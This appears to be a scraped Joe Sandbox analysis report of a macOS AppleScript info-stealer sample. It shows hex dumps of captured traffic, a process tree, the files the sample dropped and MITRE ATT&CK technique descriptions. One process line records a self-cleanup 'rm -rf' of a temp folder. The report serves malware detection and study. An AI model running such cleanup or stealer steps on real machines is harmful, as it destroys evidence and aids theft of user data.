2026-01-14 14:20:35 UTC	1460	IN	Data Raw: 29 b9 48 b9 46 d5 47 c2 98 bb 03 0a 28 dd 88 5f 58 80 be 72 6b 8e 02 47 22 95 4e d5 a2 57 e5 e0 ae f6 1a e0 d4 6b 0f 21 40 17 ed 8c 6f 89 83 79 5c f2 7a 8a 39 57 f2 df 1e 87 bb 75 92 cf 5b 7b 9d a7 17 ec 56 52 1e 24 3c d5 16 50 13 be 61 60 6a 1d 24 e3 66 28 03 10 a5 1d 6d 8d 24 b3 c0 3d 51 00 ae ec f0 fa 21 60 5b c1 b2 64 4e 34 96 bb f0 f4 f8 02 64 fb fa a1 f7 e9 b1 88 d0 d6 a7 a6 ce 1d 9e 16 2b 35 73 34 f1 cb cf 5b ad b6 85 b3 ff e8 25 ee 84 be 7e 27 9b 8c 22 13 2d ac f7 1a ea 61 b1 af b0 80 cb 22 53 58 82 a1 8f 91 12 9b 14 c3 32 34 fe 10 11 45 40 7d 5d 4a 3f 1a f9 be 37 a2 5b a2 46 43 07 ba 70 0a 12 26 d0 d1 6b f9 38 ad e4 05 c2 3b cf 05 18 9b b3 ed 1b af 44 b3 8b 2d 25 7c 88 9c c3 0f ab 59 02 ca 12 10 95 38 15 2f a1 d9 a8 7c cd 34 3d 72 ea fd 8c 32 15 Data Ascii: )HFG(_XrkG"NWk!@oy\z9Wu[{VR$<Pa`j$f(m$=Q!`[dN4d+5s4[%~'"-a"SX24E@}]J?7[FCp&k8;D-%\|Y8/\|4=r2
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: be 3e ad 0c 1d 56 2b 97 4c 06 40 70 b0 0a 59 f9 0b 38 f9 5a 3e cf ff 5f f2 fe 7c 1e 1a 1a 8d ee 6c a6 3e 7f 0a 09 b1 9f 76 bc 55 19 85 9c fa 0d 0f 46 3d 00 62 40 ae a7 8c 1e 67 30 1a 32 8c 14 a9 69 a9 6e a5 aa 3f be 29 83 7d 00 ba 9d ba ae 70 ad 7f 89 e2 17 dd 9f 07 55 13 a0 52 38 3f 68 ff 3e 7c 77 02 35 43 17 dd ba b6 22 33 53 27 e8 40 92 bd 72 dc ec f1 1b 5b 11 3f aa 3c 43 8f 93 cb 0b b1 4b eb 1a 07 e0 40 ed 00 90 68 93 91 d8 91 cc 7e 8e 3e 15 60 ce 44 b2 2a ad 57 dd 93 e9 ee 19 0e 61 8d de ca e9 16 44 28 9f 06 08 75 0b 60 70 19 4e 56 0f bc cd cd 8d 97 26 67 e8 8b 4d 82 0f bd 8f 06 11 7d 1b 99 cc b0 a4 f4 7f a5 e5 c6 2d 3d ef 89 8e 56 aa 3f 57 f4 c4 4c f1 4a 01 e8 bf b3 d2 14 46 e7 a4 cc da 12 64 5a 4a 2e 9d 9f a5 0a 05 44 6e 10 ae f0 0c 30 15 a2 25 1b Data Ascii: >V+L@pY8Z>_\|l>vUF=b@g02in?)}pUR8?h>\|w5C"3S'@r[?<CK@h~>`D*WaD(u`pNV&gM}-=V?WLJFdZJ.Dn0%
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: bd fb 3c 52 51 95 28 6c 71 b3 8d 07 14 b7 50 7c 15 af dc 3a 2e e5 19 79 83 53 13 87 e9 15 51 4b 98 37 62 02 40 e9 ae 3b ee e8 41 99 1c 53 9a e2 df f6 89 02 df 67 f3 c0 31 e4 aa 4b a8 61 2b 2a 24 5d c3 03 f2 5b 6f ef fb 20 dc ef e8 2a 3e cd 36 3d ce 13 95 53 7e 6d cf cb 03 6f f5 88 9a 8c 1f cd 15 4e 8e 6d 9f 4c 54 b2 b3 a8 95 c1 e2 1c e7 7e 6a a8 8f d4 b1 fd a8 20 03 e6 73 62 e0 da ab ea c1 c0 e1 df 8f 0f 24 e9 7b 56 97 4d 08 b9 12 89 69 73 7e 94 e6 b9 85 64 a4 ca 6b 03 2c 37 5d 72 f1 d0 76 e2 88 21 29 29 95 ff fa 29 09 b0 d9 10 cf 92 95 10 ad 01 e6 01 00 df a9 3b 6b 3a 97 1b 79 22 ee 68 61 29 c8 ab ee 57 dd d7 79 38 9a 0f 9a 6d 90 ad 5d 2d ac 30 2a 5f e9 97 e2 d2 0a 63 ab 33 80 63 f2 ba e4 33 36 75 6b 71 e0 d2 c6 f1 18 89 52 2d be e7 25 35 82 b2 5c 3c bb Data Ascii: <RQ(lqP\|:.ySQK7b@;ASg1Ka+$][o >6=S~moNmLT~j sb${VMis~dk,7]rv!)));k:y"ha)Wy8m]-0*_c3c36ukqR-%5\<
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: 2e a7 84 00 f8 6e db ed f9 c1 77 5c 46 13 7d 5a 9b ac f4 82 28 d7 3a 75 c8 5a 02 3c eb 7a fe 2f 97 f5 bb 60 b1 d8 58 f2 57 a2 09 8c a5 42 a5 6c 55 0f 21 48 23 ab 2f 1e 16 ea 72 11 b1 7e bf 6d 8f d3 5f ff b8 6e b7 eb c7 e9 be 3d f6 db ef 70 e8 5d 4a 1b f7 2f a4 ce bf 60 99 0f 21 5c 86 95 fb 61 d9 2a e2 42 9a 8a 44 05 5c 2f ca 48 a4 16 80 57 99 ad cc e2 2e 76 e5 a7 cf 3b 94 67 b8 f1 64 8f 2b f1 a8 c8 f4 7f 6d 27 4c 2a d4 0b f1 be 7b 92 fb 3c 55 bc 64 5b ee 29 0e 08 85 d1 96 62 d2 43 de 1a 01 7c fa cb 04 c5 5f 63 e4 f9 09 7d 13 61 ad 7e bf da 3e c6 c7 98 8b 23 00 8a a7 f6 b5 26 1a 7d 8e 2e ef 40 4d ad 41 b3 6f fc 7d 95 e9 ba 7b 8d 24 ce 83 6f a5 36 eb 6f e1 9b 7a de fa 77 28 16 76 67 55 d0 cd 0d f6 66 f5 b0 34 bf 26 b8 4f 2d bb af c7 76 f9 c0 9b 0e 0f 97 ae Data Ascii: .nw\F}Z(:uZ<z/`XWBlU!H#/r~m_n=p]J/`!\aBD\/HW.v;gd+m'L{<Ud[)bC\|_c}a~>#&}.@MAo}{$o6ozw(vgUf4&O-v
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: 27 2a 3e 12 b2 af 1f d7 63 9f 38 70 ce 45 9f c0 af c6 e3 65 d0 0f 29 9a 1b de 66 32 cc f0 d2 2a 12 a6 81 12 92 e5 a5 3d 6c f3 69 4a f0 78 23 75 2d 5c 49 c7 e8 e3 dc cd 9b b7 e4 97 dc ba 56 fc e1 cc 95 8d 81 f3 69 7f 83 f8 58 9e 89 2a 97 3a a7 ba 6a c7 11 08 68 a6 10 7b fd 5c 62 9e d2 a9 99 8d 4c b1 f6 8c bd 76 e5 c0 05 c8 87 24 92 74 bc d7 63 fd 9e 56 68 38 f1 ad 0f f5 46 1c 31 24 c7 56 4a c9 bd bd b2 65 78 ab 50 f6 ea d9 db fe f9 26 c8 fc 31 b5 7d 73 13 ae eb dd 45 5b d9 e5 bd 7c b5 12 3e 59 e1 e6 71 70 22 d3 52 42 27 0a 90 45 c0 7e c9 07 5b 38 a5 6c cb 87 5a 85 e0 4a 79 1d b2 e5 1b 87 26 e8 e3 f3 df 09 5c 96 fa a4 d5 69 ce 7a 3c a5 5a 23 a1 10 3c 35 8a d9 44 f1 e9 ed 03 32 38 ff 4d 8a ae 1c ca 42 5c 25 89 55 01 c9 37 6f 99 ae e9 af cb 07 44 13 f0 b1 91 Data Ascii: '>c8pEe)f2=liJx#u-\IViX*:jh{\bLv$tcVh8F1$VJexP&1}sE[\|>Yqp"RB'E~[8lZJy&\iz<Z#<5D28MB\%U7oD
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: 7c ad 6d ad 13 f6 cb 34 3c b2 29 e0 34 96 4a 08 8e c5 4c 64 08 cc 74 47 2c 6d b1 1b 31 65 79 b3 41 08 68 6c 63 4d ab 0c 4b 5b b2 2e 47 ce 85 45 d5 31 75 b5 45 79 d3 60 65 c3 ff 72 a6 30 ac bb 57 03 5a f5 75 de 6e 8f 27 64 bd 69 a3 5a c3 95 9d 30 94 a7 de 8d 06 dd 7e fa 27 10 32 8b 4d bd ca e1 12 a7 1a 58 ac 23 75 af 8f e4 b8 d1 ed df da 1a a3 fa 2f ed cb 7a 9f d5 da ae 8c 1a af 9e e6 84 06 6d 9a bb 85 01 fe 3f 6f 70 12 9e 94 04 86 51 cd 09 df ae a3 ee 4c e1 d4 ca 10 b1 a4 33 5f 2f 18 29 f7 47 a1 5b d3 c0 4b d2 03 13 83 a1 a4 d1 23 9c 68 4e d4 50 f2 b0 96 ad ed b1 80 81 0b b6 fa a2 6b 57 00 17 cf f8 6b dd b8 c2 3c db 96 36 c1 8d 42 99 85 4b f4 d5 de c9 d3 fc c9 e1 51 6d be ba 7c 34 12 0c d8 f9 01 10 a2 2d 5d 2e 77 a1 2e 12 0b b5 32 75 1f 9f e0 c3 7d 94 45 Data Ascii: \|m4<)4JLdtG,m1eyAhlcMK[.GE1uEy`er0WZun'diZ0~'2MX#u/zm?opQL3_/)G[K#hNPkWk<6BKQm\|4-].w.2u}E
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: ce 98 0e ef b7 d3 6f e0 ec ea c3 df b9 52 7f fd eb bc 61 be 79 bb 3f 7e 6c b0 e5 3e 5f 3f c4 0d 40 86 0b 65 4e a6 ef fa 1c 5f fe 27 aa ff cb 7d ff 38 6f f7 eb 09 6b 71 be 98 7a c6 19 f4 27 5e c4 9d af f6 f3 f9 db 05 20 87 5f c4 9e c2 59 ee fe 5b 7f f6 c7 6f 1b b6 cc 9d 2b 7e bb 9d f9 a3 ce bf 9d b7 c7 e7 cd 1f 03 24 8c c7 fc 84 52 24 be 77 07 88 f1 79 fd f3 be 3d 1f b7 bf fe ed ff fb 5f ff c7 9f 3f ff af ed c7 ff f3 1f 5f ff f9 1f ff c7 1f ff f1 af ff f8 9f ff f9 bf fc db ff fd f5 9f 3f ff ed 7f fc bf ff e7 ff f6 6f ff b8 80 93 f9 a9 61 1a 51 2b dc 3a 97 ed e4 16 94 3b 75 94 a5 97 e6 0a 15 14 82 3f a2 06 a4 75 1d 44 44 05 40 02 4b d8 a8 73 19 b5 11 24 14 91 05 79 e4 61 c2 2a ae ad c5 2c d8 78 3a df c3 f9 49 77 f6 df b7 f3 0e f0 86 22 24 5f f1 fd 8c 99 fe Data Ascii: oRay?~l>_?@eN_'}8okqz'^ _Y[o+~$R$wy=_?_?oaQ+:;u?uDD@Ks$ya*,x:Iw"$_
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: f2 7e 41 45 87 f6 da 57 5c 44 0b d9 22 b9 9d a8 16 75 4c 0e d9 4a 36 19 2c 09 f4 45 26 0d 1f 8f 3c 44 29 32 ea bf 74 6f d7 2b c5 16 91 80 97 9d b3 4a cf 8b 9f 86 2d af 46 d0 ed 5c 11 78 c6 ed 6d c5 64 0f 9e ae 8f 38 8a 95 3f 3d 09 57 cc 2e e8 2a e6 68 28 a9 5d 28 12 52 49 91 3e 70 fe 81 86 86 f3 bf dc 4b 7a 79 c8 4b 78 16 08 c2 53 66 b1 b2 08 d3 64 fb b5 30 3c 84 5c ad 47 56 8e a1 12 cd e2 a1 66 99 be 7f cb bf 5a 72 e0 41 84 d0 40 2b ca 4f 83 e4 bc 5a e0 be d2 0d e5 6f e8 cc 09 ba 05 08 57 04 c8 05 11 60 95 d2 92 06 55 4e 1c c6 f4 99 3a 31 17 bc 25 b9 f0 77 16 16 ad 63 ea 10 a3 e3 04 c6 e0 41 92 87 15 1a 29 c1 a9 53 80 0d c1 54 e3 13 86 b3 77 30 32 4e 28 3e 3a 15 0b f1 66 62 d4 49 30 a3 d9 1f 91 48 43 40 5c ee bf 50 cd 53 35 6f 7d 3f b4 47 50 9b 13 44 21 Data Ascii: ~AEW\D"uLJ6,E&<D)2to+J-F\xmd8?=W.*h(](RI>pKzyKxSfd0<\GVfZrA@+OZoW`UN:1%wcA)STw02N(>:fbI0HC@\PS5o}?GPD!
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: 22 0d 34 23 13 3d e4 af 30 0b 3b 69 e8 cf 9c b6 eb 19 f2 4c 78 8f e7 04 a1 ca 53 8e d3 c0 f1 d2 bb 4e dc 4e 8f ad 50 c2 32 e0 63 f0 4a 98 1b 99 61 52 e2 d3 21 8b ae af 1a 01 9c 25 bb 69 14 e8 30 74 b1 3f a0 66 82 ff a0 63 46 09 41 f5 da d1 54 67 8b e3 4f 42 16 9b c4 66 81 e0 f2 44 d2 5d 4f 2a c0 d3 d7 91 80 2a cb a3 6a 0a 14 5b 64 80 12 b8 c3 50 93 0b 8f ef e1 64 7d 51 20 4f 03 b4 4d a9 f6 33 8e 13 64 b9 12 9b d9 05 02 0c f1 4a a8 ee 14 e5 56 9d 83 ec c2 4a 76 2f e4 05 a1 7d 6a c8 c7 ab 4b a4 86 ea a0 1c fe 04 f5 48 b0 b3 3d 5b d3 06 41 79 a2 f0 4d 3d d4 33 e0 28 c8 32 42 3a f2 c9 52 2e 91 f8 52 1d 05 dd b8 81 78 8b e4 4e 3e b8 2f 5a a3 05 48 02 d3 f7 51 56 63 c2 c4 2b 9e e2 d1 61 54 a2 aa 8a e2 86 9c e9 2e 04 a7 c8 6c 18 5d 20 62 4a f2 6a e7 1c ae e1 34 Data Ascii: "4#=0;iLxSNNP2cJaR!%i0t?fcFATgOBfD]O**j[dPd}Q OM3dJVJv/}jKH=[AyM=3(2B:R.RxN>/ZHQVc+aT.l] bJj4
2026-01-14 14:20:35 UTC	1460	IN	Data Raw: 9e 9e 99 9f f8 5f a1 98 f3 43 3c d2 66 24 ae 36 11 23 b9 f4 48 f4 c1 0e 0b 35 6f e9 84 c8 cb b7 91 c1 88 8a e6 d8 6b f2 a2 d7 31 d2 66 cd 68 57 6e 93 3a 6b 25 9b 35 e6 65 1e 74 14 1e a2 fc f6 ec d3 d5 ac a7 94 10 48 2e 9e 7f b0 ff 63 5c 46 a1 af b8 7b 9d 95 0a 86 ed 7e 14 6f 2d e0 32 76 bc 19 3e 40 d9 40 fe fb ae df 0f da 6a 1c 1a d4 70 de b9 d5 b8 fd 82 ef 36 38 ba b8 20 9e 63 1a f4 8e 13 27 34 af 9d 3f ff fa d7 76 bf 83 61 e3 39 1a d3 4b f2 53 80 12 03 e2 23 71 22 78 2d ce 75 b1 69 f7 d3 d1 89 98 a9 90 86 de 73 1b d5 97 34 af 7b 41 e0 56 58 ac cb de 17 68 38 28 19 20 09 9c ee e2 4b 93 7a cf 96 4d 37 c8 06 47 55 7d 41 e0 53 8b 4a 6c 6e f3 28 01 cc 23 0e cb 3f 19 63 09 f7 38 0c 32 45 43 99 5a 95 1e 12 e5 6f 88 64 8c 7c a3 dc af e2 30 18 af 82 b7 fd 8e 63 Data Ascii: _C<f$6#H5ok1fhWn:k%5etH.c\F{~o-2v>@@jp68 c'4?va9KS#q"x-uis4{AVXh8( KzM7GU}ASJln(#?c82ECZod\|0c

Start time (UTC):	14:18:04
Start date (UTC):	14/01/2026
Path:	/sbin/launchd
Arguments:	-
File size:	1147136 bytes
MD5 hash:	a94b6404ce162119cbd5c4394e744836

Start time (UTC):	14:18:05
Start date (UTC):	14/01/2026
Path:	/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
Arguments:	-
File size:	2207824 bytes
MD5 hash:	8f1f4a908774e604de5cfdfccbe8e025

Start time (UTC):	14:18:17
Start date (UTC):	14/01/2026
Path:	/bin/bash
Arguments:	-
File size:	1310224 bytes
MD5 hash:	83116cbffb2ff98b687b909de76e7bc2

Start time (UTC):	14:18:26
Start date (UTC):	14/01/2026
Path:	/usr/bin/osascript
Arguments:	-
File size:	175744 bytes
MD5 hash:	5f83ecd5cfb91995b8ef3b640215348f

Start time (UTC):	14:18:27
Start date (UTC):	14/01/2026
Path:	/usr/bin/osascript
Arguments:	-
File size:	175744 bytes
MD5 hash:	5f83ecd5cfb91995b8ef3b640215348f

Start time (UTC):	14:18:45
Start date (UTC):	14/01/2026
Path:	/usr/bin/osascript
Arguments:	-
File size:	175744 bytes
MD5 hash:	5f83ecd5cfb91995b8ef3b640215348f

Start time (UTC):	14:20:25
Start date (UTC):	14/01/2026
Path:	/usr/bin/osascript
Arguments:	-
File size:	175744 bytes
MD5 hash:	5f83ecd5cfb91995b8ef3b640215348f

Start time (UTC):	14:20:26
Start date (UTC):	14/01/2026
Path:	/bin/bash
Arguments:	sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75
File size:	1310224 bytes
MD5 hash:	83116cbffb2ff98b687b909de76e7bc2

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report payload_1_stealer.scpt

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Suricata Signatures

Joe Sandbox Signatures

Cryptography

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Persistence and Installation Behavior

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt

/Users/jess/.bash_sessions/75A3C1DC-74DD-49F5-A23E-2D938806E22F.historynew

/Users/jess/Library/Containers/com.apple.Notes/Data/Library/HTTPStorages/com.apple.Notes/httpstorages.sqlite

/Users/jess/Library/Containers/com.apple.Notes/Data/Library/HTTPStorages/com.apple.Notes/httpstorages.sqlite-journal

/Users/jess/Library/Containers/com.apple.Notes/Data/Library/HTTPStorages/com.apple.Notes/httpstorages.sqlite-shm

/Users/jess/Library/Containers/com.apple.Notes/Data/Library/HTTPStorages/com.apple.Notes/httpstorages.sqlite-wal

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_031lUb/NotesIndexerState-Modern

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_3nR46B/NotesIndexerState-Modern

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_8Nhm0A/NotesIndexerState-Modern

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_BXLAzO/NotesIndexerState-Modern

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_GGD2MG/NotesIndexerState-HTML

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_HUu32a/NotesIndexerState-Modern

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_Ht0qUQ/NotesIndexerState-HTML

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_JSAeuO/NotesIndexerState-HTML

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_JcqD2u/NotesIndexerState-HTML

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_dJVnzk/NotesIndexerState-HTML

/Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_oiZkwB/NotesIndexerState-Modern

/Users/jess/Library/Group Containers/group.com.apple.notes/Thumbnails/Default/PaperPreview-Dark-RegularText-RegularColors.json

/Users/jess/Library/Group Containers/group.com.apple.notes/Thumbnails/Default/PaperPreview-Dark-RegularText-RegularColors.png

/Users/jess/Library/Group Containers/group.com.apple.notes/Thumbnails/Default/PaperPreview-Light-RegularText-RegularColors.json

/Users/jess/Library/Group Containers/group.com.apple.notes/Thumbnails/Default/PaperPreview-Light-RegularText-RegularColors.png

/private/tmp/a5b9845c461d901dad1363386bac5a75.zip

/private/tmp/app.asar

/private/tmp/app.asar.zip

/private/tmp/downloaded_parts/part1.aspx

/private/tmp/downloaded_parts/part2.aspx

/private/tmp/downloaded_parts/part3.aspx

/private/tmp/zixiNUg5

Static File Info

General

macOS Analysis Report
payload_1_stealer.scpt

Start time (UTC):	14:20:28
Start date (UTC):	14/01/2026
Path:	/usr/bin/osascript
Arguments:	-
File size:	175744 bytes
MD5 hash:	5f83ecd5cfb91995b8ef3b640215348f

Start time (UTC):	14:20:31
Start date (UTC):	14/01/2026
Path:	/usr/bin/osascript
Arguments:	-
File size:	175744 bytes
MD5 hash:	5f83ecd5cfb91995b8ef3b640215348f

Start time (UTC):	14:20:34
Start date (UTC):	14/01/2026
Path:	/usr/bin/osascript
Arguments:	-
File size:	175744 bytes
MD5 hash:	5f83ecd5cfb91995b8ef3b640215348f

Start time (UTC):	14:20:35
Start date (UTC):	14/01/2026
Path:	/usr/bin/osascript
Arguments:	-
File size:	175744 bytes
MD5 hash:	5f83ecd5cfb91995b8ef3b640215348f

Start time (UTC):	14:18:40
Start date (UTC):	14/01/2026
Path:	/sbin/launchd
Arguments:	-
File size:	1147136 bytes
MD5 hash:	a94b6404ce162119cbd5c4394e744836

Start time (UTC):	14:18:56
Start date (UTC):	14/01/2026
Path:	/sbin/launchd
Arguments:	-
File size:	1147136 bytes
MD5 hash:	a94b6404ce162119cbd5c4394e744836

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Tactics:	Execution
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Tactics:	Defense Evasion
Data Sources:	Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification, Command: Command Execution, Driver: Driver Load, File: File Deletion, File: File Modification, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Process: OS API Execution, Process: Process Creation, Process: Process Modification, Process: Process Termination, Script: Script Execution, Sensor Health: Host Status, Service: Service Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre